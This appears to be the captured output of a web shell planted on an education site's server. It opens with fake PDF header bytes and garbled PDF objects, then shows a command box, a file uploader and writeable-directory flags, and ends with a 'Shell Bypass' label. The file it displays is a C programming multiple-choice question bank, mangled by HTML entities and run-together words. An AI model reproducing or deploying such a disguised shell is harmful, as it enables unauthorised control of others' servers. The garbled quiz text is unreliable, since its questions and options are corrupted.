%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/chalkbank.com/xls/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/chalkbank.com/xls/question_bank-1627199003.csv
S. No.,Question type,Category, Level, Question, Correct Answer,Option One,Option Two,Option Three,Option Four
1,Multiple Choice Single Answer,C Programming Basics,Level 1,Which is used to convert source code to target language,4,Linker&nbsp;,Loader,Executor,Compiler
2,Multiple Choice Single Answer,C Programming Basics,Level 1,Parul takes as input two numbers: a and b. a and b can take integer valuesbetween 0 and 255. She stores ab and c as 1-byte data type. She writes the following code statement to process a and b and put the result in c.c = a + 2*bTo her surprise her program gives the right output with some input values of a and bwhile gives an erroneous answer for others. For which of the following inputs will it give a wrong answer?,2,a&nbsp; = 200b = 10,a = 10b = 200,a = 50b = 100,a = 100b = 50
3,Multiple Choice Single Answer,C Programming Basics,Level 1,A 10-bit unsigned integer has the following range:&nbsp;,3,0 - 1000,0 - 1024,0 - 1023,0 - 1025
4,Multiple Choice Single Answer,C Programming Basics,Level 1,A language has 28 different letters in total. Each word in the language iscomposed of maximum 7 letters. You want to create a data-type to store a word of this language. You decide to store the word as an array of letters. How many bytes will you assign to the data-type to be able to store all kinds of words of the language.,1,7,75,28,196
5,Multiple Choice Single Answer,C Programming Basics,Level 1,A data type is stored as a 6 bit signed integer. Which of the following cannot be represented by this data type?,4,-12,6,18,32
6,Multiple Choice Single Answer,C Programming Basics,Level 1,What is the output of the following code statements? The compiler saves the first integer at the memory location 4165 and the rest at consecutive memory spaces in order of declaration. Integer is one byte long.,,,,,
integer a,,,,,,,,,
pointer cd,,,,,,,,,
a = 30c = &amp;a,,,,,,,,,
c = &amp;a,,,,,,,,,
d = c,,,,,,,,,
a = a + 10,,,,,,,,,
print *c,,,,,2,30,40,4165,4166
7,Multiple Choice Single Answer,C Programming Basics,Level 1,Neelam wants to share her code with a colleaguewho may modify it. Thus she wants to include the date of the program creationthe author and other she wants to include the date of the program creationthe author and other information with the program. What component should she use?,3,header files,iteration,comments,pre-processor
8,Multiple Choice Single Answer,C Programming Basics,Level 1,When we declare constant pointer to integerwe cannot change:,,,,,
&nbsp;,,,,,4,value pointed by pointer,Either addressing pointer variable or value at that address,changes are not permitted,address in pointer variable
9,Multiple Choice Single Answer,C Programming Basics,Level 1,Which argument is passed to fflush()?,2,no parameters,stdin,stdout,stderr
10,Multiple Choice Single Answer,C Programming Basics,Level 1,Which combination of integer variables ab and c makes the variable m gets the value 4 in the following expression?,,,,,
m = (a &gt; b) ? ((a &gt; c) ? a : c) : (b &gt; c) ? b : c),,,,,4,a = 6b =&nbsp; 3c = 5,a = 6b =&nbsp; 5c = 3,a = 5b =&nbsp; 4c = 5,a = 3b =&nbsp; 4c = 2
11,Multiple Choice Single Answer,C Programming Basics,Level 1,What is the mathematical function used to round off 6.23 to 7,4,floor(6.23),ceil(6.237),floor(6.237),ceil(6.23)
12,Multiple Choice Single Answer,C Programming Basics,Level 1,Which data structure is used to convert an expression from one form to another?,2,Graph,Stack,Linked List,Queue
13,Multiple Choice Single Answer,C Programming Basics,Level 1,int m = 10n = 35p = 5d = 6;,,,,,
Comment on the output of the following two statements executed sequentially:,,,,,,,,,
print m * n + p / d,,,,,,,,,
printf p / d + m * n,,,,,,,,,
&nbsp;,,,,,2,differ by 10,same,differ by 20,differ due to left and right precedence
14,Multiple Choice Single Answer,C Programming Basics,Level 1,What wil be the value of the fseek() function if error occurs?,3,0,Null,Any non-zero value,1
15,Multiple Choice Single Answer,C Programming Basics,Level 2,What will be the output of the following lines of code:,,,,,
#include &lt;stdio.h&gt;,,,,,,,,,
int main(),,,,,,,,,
{,,,,,,,,,
"&nbsp; &nbsp; printf(""%d""",25 ? 5 ? 0:5:25);,,,,,,,,
&nbsp; &nbsp; return 0;,,,,,,,,,
},,,,,4,5,compile time error,25,0
16,Multiple Choice Single Answer,C Programming Basics,Level 1,Which of these functions is used to show the key pressed by the user on the screen?,2,gets(),getche(),getch(),fgets()
17,Multiple Choice Single Answer,C Programming Basics,Level 1,Assume a linked list as Head 2 --&gt; 4 --&gt; 6 --&gt; 8,,,,,
What will be the output of the following program:,,,,,,,,,
structemp,,,,,,,,,
{,,,,,,,,,
&nbsp; &nbsp; &nbsp;int empid:,,,,,,,,,
&nbsp; &nbsp; &nbsp;structemp *next;,,,,,,,,,
};,,,,,,,,,
structemp *head*next;,,,,,,,,,
temp = head;,,,,,,,,,
while (temp--&gt;next != Null),,,,,,,,,
{,,,,,,,,,
"&nbsp; &nbsp; printf(""%d"" temp--&gt;empid);",,,,,,,,,
&nbsp; &nbsp; temp = temp--&gt;next;,,,,,,,,,
},,,,,2,2460,246,2468,246Null
18,Multiple Choice Single Answer,C Programming Basics,Level 1,Among the following loops which is a post-tested loop?,1,do while,while,for,if

Kontol Shell Bypass